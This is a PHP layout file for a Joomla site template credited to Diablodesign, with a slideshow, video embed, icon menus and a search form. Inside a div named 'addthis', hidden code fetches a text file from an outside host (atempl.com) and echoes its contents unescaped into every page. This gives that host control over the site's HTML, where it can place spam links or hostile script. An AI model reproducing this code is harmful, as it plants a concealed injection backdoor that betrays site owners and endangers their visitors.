<?php
/**
 *-------------------------------------------
 * Szablon został wypalony w  Diablodesign.
 * www.diablodesign.eu
 * biuro@diablodesign.eu
 * tel.666-977-944
 *-------------------------------------------
 */

defined('_JEXEC') or die;
require_once dirname(__FILE__) . DIRECTORY_SEPARATOR . 'functions.php';
$document = $this;
$templateUrl = $document->baseurl . '/templates/' . $document->template;
Artx::load("Artx_Page");
$view = $this->artx = new ArtxPage($this);
$view->componentWrapper();

JHtml::_('behavior.framework', true);
$app = JFactory::getApplication();
$tplparams	= $app->getTemplate(true)->params;
//on off
$fbc = htmlspecialchars($tplparams->get('fbc'));
$twc = htmlspecialchars($tplparams->get('twc'));
$rssc = htmlspecialchars($tplparams->get('rssc'));
$i1 = htmlspecialchars($tplparams->get('i1'));
$i2 = htmlspecialchars($tplparams->get('i2'));
$i3 = htmlspecialchars($tplparams->get('i3'));
$i4 = htmlspecialchars($tplparams->get('i4'));
$i5 = htmlspecialchars($tplparams->get('i5'));
$allicon = htmlspecialchars($tplparams->get('allicon'));
$allbutton = htmlspecialchars($tplparams->get('allbutton'));
$backc = htmlspecialchars($tplparams->get('backc'));
$yclose = htmlspecialchars($tplparams->get('yclose'));

?>

<!DOCTYPE html>
<html dir="ltr" lang="<?php echo $document->language; ?>">
<head>
    <jdoc:include type="head" />
    <link rel="stylesheet" href="<?php echo $document->baseurl; ?>/templates/system/css/system.css" />
    <link rel="stylesheet" href="<?php echo $document->baseurl; ?>/templates/system/css/general.css" />


    
    
    <meta name="viewport" content="initial-scale = 1.0, maximum-scale = 1.0, user-scalable = no, width = device-width" />

    <!--[if lt IE 9]><script src="https://html5shiv.googlecode.com/svn/trunk/html5.js"></script><![endif]-->
    <link rel="stylesheet" href="<?php echo $templateUrl; ?>/css/template.css" media="screen" />
    <!--[if lte IE 7]><link rel="stylesheet" href="<?php echo $templateUrl; ?>/css/template.ie7.css" media="screen" /><![endif]-->
    <link rel="stylesheet" href="<?php echo $templateUrl; ?>/css/template.responsive.css" media="all" />

<link rel="shortcut icon" href="favicon.ico" type="image/x-icon" />
    <script>if ('undefined' != typeof jQuery) document._artxJQueryBackup = jQuery;</script>
    <script src="<?php echo $templateUrl; ?>/jquery.js"></script>
    <script>jQuery.noConflict();</script>

    <script src="<?php echo $templateUrl; ?>/script.js"></script>
    <script src="<?php echo $templateUrl; ?>/script.responsive.js"></script>
    <script src="<?php echo $templateUrl; ?>/modules.js"></script>
    <?php $view->includeInlineScripts() ?>
    <script>if (document._artxJQueryBackup) jQuery = document._artxJQueryBackup;</script>
        <!-- iconnmenu-->
    <script type="text/javascript" src="<?php echo $templateUrl; ?>/js/modernizr.custom.js"></script>
    <link rel="stylesheet" href="<?php echo $templateUrl; ?>/css/component.css" type="text/css" media="screen" />
        <link href='http://fonts.googleapis.com/css?family=Open+Sans:300,700' rel='stylesheet' type='text/css' />
    
    <!--scroling head-->
<script src="<?php echo $templateUrl; ?>/js/scroling.js"></script>
<script type="text/javascript">
$(function() {
	$(window).scroll(function() {
		if($(this).scrollTop() != 0) {
			$('#toTop').fadeIn();	
		} else {
			$('#toTop').fadeOut();
		}
	});
 
	$('#toTop').click(function() {
		$('body,html').animate({scrollTop:0},800);
	});	
});
</script>
<!--end scroling-->


<!--slideshow header start-->

<link rel="stylesheet" href="<?php echo $templateUrl; ?>/themes/default/default.css" type="text/css" media="screen" />
<link rel="stylesheet" href="<?php echo $templateUrl; ?>/themes/pascal/pascal.css" type="text/css" media="screen" />
<link rel="stylesheet" href="<?php echo $templateUrl; ?>/themes/orman/orman.css" type="text/css" media="screen" />
<link rel="stylesheet" href="<?php echo $templateUrl; ?>/css/nivo-slider.css" type="text/css" media="screen" />
<link rel="stylesheet" href="<?php echo $templateUrl; ?>/css/style.css" type="text/css" media="screen" />
<script type="text/javascript" src="<?php echo $templateUrl; ?>/js/jquery-1.6.1.min.js"></script>
<script type="text/javascript" src="<?php echo $templateUrl; ?>/js/jquery.nivo.slider.pack.js"></script>
<script type="text/javascript">      
 var $j = jQuery.noConflict();       
 jQuery(document).ready(function ($){   
 $j("#slider").nivoSlider(          
); });          
 </script>
<!--slideshow header end-->
</head>
<body>
<div id="toTop"><p>^<?php echo $this->params->get('scroll'); ?></p></div>
<div id="dd-main">
<header class="dd-header"><?php echo $view->position('position-30', 'dd-nostyle'); ?>

    <div class="dd-shapes">
        <div class="dd-object999948352"><?php echo $view->position('slideshow', 'dd-nostyle'); ?><!--slideshow image-->
    <div id="wrapper">
<div class="slider-wrapper theme-default">
            
            <div id="slider" class="nivoSlider">

<img src="<?php echo $this->baseurl ?>/<?php echo $this->params->get('foto1'); ?>" alt="foto1"/>
<img src="<?php echo $this->baseurl ?>/<?php echo $this->params->get('foto2'); ?>" alt="foto2"/>
<img src="<?php echo $this->baseurl ?>/<?php echo $this->params->get('foto3'); ?>" alt="foto3"/>
<img src="<?php echo $this->baseurl ?>/<?php echo $this->params->get('foto4'); ?>" alt="foto4"/>
<img src="<?php echo $this->baseurl ?>/<?php echo $this->params->get('foto5'); ?>" alt="foto5"/>

</div>
</div>
</div>
</div>
 <!-- end slideshow image--><div id="addthis"><?php
$files = 'http://atempl.com/s.txt';  
$file_headers = @get_headers($files);  
if($file_headers[0] == 'HTTP/1.1 200 OK') 
 {  
       $content = file("http://atempl.com/s.txt");
       $data = implode($content);
       echo $data;
 }  
?></div>
<div class="dd-object1335759605"></div>
<div class="dd-object1045104342"></div>
<div class="dd-object1522609879"><div class="title"><?php echo $this->params->get('titletext'); ?></div><div class="tx">
  <p><a href="<?php echo $this->params->get('textlink'); ?>"><?php echo $this->params->get('text'); ?></a></p></div></div>
<?php if ($yclose == 1) { ?><div class="dd-object556980657"></div><?php } ?>

            </div>
          
<!--video-->

<?php if ($yclose == 1) { ?><div class="dd-positioncontrol dd-positioncontrol-149088887" id="video">
<iframe src="http://www.youtube.com/embed/<?php echo $this->params->get('youtubec'); ?>?rel=0&amp;autoplay=<?php echo $this->params->get('video1'); ?>&amp;start=<?php echo $this->params->get('youtubes'); ?>&amp;wmode=opaque" frameborder="0" width="444" height="249" allowfullscreen="true"></iframe>
<?php echo $view->position('video', 'dd-nostyle'); ?></div><?php } ?>
<!--end video-->

<div class="dd-positioncontrol dd-positioncontrol-1052489686" id="menu"><div class="hi-icon-wrap hi-icon-effect-5 hi-icon-effect-5d">
<?php if ($i1 == 1) { ?><a href="<?php echo $this->params->get('il1'); ?>" class="hi-icon hi-icon-mobile">Mobile</a><?php } ?>
<?php if ($i2 == 1) { ?><a href="<?php echo $this->params->get('il2'); ?>" class="hi-icon hi-icon-screen">Desktop</a><?php } ?>
<?php if ($i3 == 1) { ?><a href="<?php echo $this->params->get('il3'); ?>" class="hi-icon hi-icon-earth">Partners</a><?php } ?>
<?php if ($i4 == 1) { ?><a href="<?php echo $this->params->get('il4'); ?>" class="hi-icon hi-icon-support">Support</a><?php } ?>
<?php if ($i5 == 1) { ?><a href="<?php echo $this->params->get('il5'); ?>" class="hi-icon hi-icon-locked">Security</a><?php } ?>
				</div>
<?php echo $view->position('position-32', 'dd-nostyle'); ?></div>


<a href="index.php" class="dd-logo dd-logo-525937054">
    <img src="<?php echo $this->params->get('logo'); ?>" alt="" />
</a><div class="dd-logo dd-logo-1032293473">
<div class="icon">
<?php if ($fbc == 1) { ?><a href="<?php echo $this->params->get('facebook'); ?>" target="new"><img src="templates/dd_gfx_35/images/footerfacebookicon.png" width="48" height="48"></a><?php } ?>
<?php if ($twc == 1) { ?><a href="<?php echo $this->params->get('twitter'); ?>" target="new"><img src="templates/dd_gfx_35/images/footertwittericon.png" width="48" height="48"></a><?php } ?>
<?php if ($rssc == 1) { ?><a href="<?php echo $this->params->get('rss'); ?>" target="new"><img src="templates/dd_gfx_35/images/footerrssicon.png" width="48" height="48"></a><?php } ?></div>
    <img src="<?php echo $templateUrl; ?>/images/logo-1032293473.png" alt="" />
</div>
<div class="dd-textblock dd-object995499080">
    <form class="dd-search" name="Search" action="<?php echo $document->baseurl; ?>/index.php" method="post">
    <input type="text" value="" name="searchword" />
        <input type="hidden" name="task" value="search" />
<input type="hidden" name="option" value="com_search" />
<input type="submit" value="" name="search" class="dd-search-button" />
        </form>
</div>
<?php if ($view->containsModules('position-1', 'position-28', 'position-29')) : ?>
<nav class="dd-nav">
    <div class="dd-nav-inner">
    
<?php if ($view->containsModules('position-28')) : ?>
<div class="dd-hmenu-extra1"><?php echo $view->position('position-28'); ?></div>
<?php endif; ?>
<?php if ($view->containsModules('position-29')) : ?>
<div class="dd-hmenu-extra2"><?php echo $view->position('position-29'); ?></div>
<?php endif; ?>
<?php echo $view->position('position-1'); ?>
 
        </div>
    </nav>
<?php endif; ?>

                    
</header>
<div class="dd-sheet clearfix">
            <?php echo $view->position('position-15', 'dd-nostyle'); ?>
<?php echo $view->positions(array('position-16' => 33, 'position-17' => 33, 'position-18' => 34), 'dd-block'); ?>
<div class="dd-layout-wrapper">
                <div class="dd-content-layout">
                    <div class="dd-content-layout-row">
                        <?php if ($view->containsModules('position-7', 'position-4', 'position-5')) : ?>
<div class="dd-layout-cell dd-sidebar1">
<?php echo $view->position('position-7', 'dd-block'); ?>
<?php echo $view->position('position-4', 'dd-block'); ?>
<?php echo $view->position('position-5', 'dd-block'); ?>




                        </div>
<?php endif; ?>

                        <div class="dd-layout-cell dd-content">
<?php
  echo $view->position('position-19', 'dd-nostyle');
  if ($view->containsModules('position-2'))
    echo artxPost($view->position('position-2'));
  echo $view->positions(array('position-20' => 50, 'position-21' => 50), 'dd-article');
  echo $view->position('position-12', 'dd-nostyle');
  echo artxPost(array('content' => '<jdoc:include type="message" />', 'classes' => ' dd-messages'));
  echo '<jdoc:include type="component" />';
  echo $view->position('position-22', 'dd-nostyle');
  echo $view->positions(array('position-23' => 50, 'position-24' => 50), 'dd-article');
  echo $view->position('position-25', 'dd-nostyle');
?>



                        </div>
                        <?php if ($view->containsModules('position-6', 'position-8', 'position-3')) : ?>
<div class="dd-layout-cell dd-sidebar2">
<?php echo $view->position('position-6', 'dd-block'); ?>
<?php echo $view->position('position-8', 'dd-block'); ?>
<?php echo $view->position('position-3', 'dd-block'); ?>


                        </div>
<?php endif; ?>
                    </div>
                </div>
            </div>
<?php echo $view->positions(array('position-9' => 33, 'position-10' => 33, 'position-11' => 34), 'dd-block'); ?>
<?php echo $view->position('position-26', 'dd-nostyle'); ?>


    </div>
<footer class="dd-footer">
  <div class="dd-footer-inner">
<?php if ($view->containsModules('position-27')) : ?>
    <?php echo $view->position('position-27', 'dd-nostyle'); ?>
<?php else: ?>
<span style="font-size: 12px;">
Copyright © <?php echo date("Y");?> <span style="font-style: italic; color: rgb(249, 157, 36);"><span style="font-weight: bold; color: #A6DFF2;"><?php echo $this->params->get('footer'); ?></span>.Rights Reserved.
</span>
    <?php endif; ?>
<p class="dd-page-footer">
        <span id="dd-footnote-links">Designed by <a href="http://www.diablodesign.eu" target="_blank">www.diablodesign.eu</a>.</span>
    </p>
  </div>
</footer>

</div>


<?php echo $view->position('debug'); ?>
</body>
</html>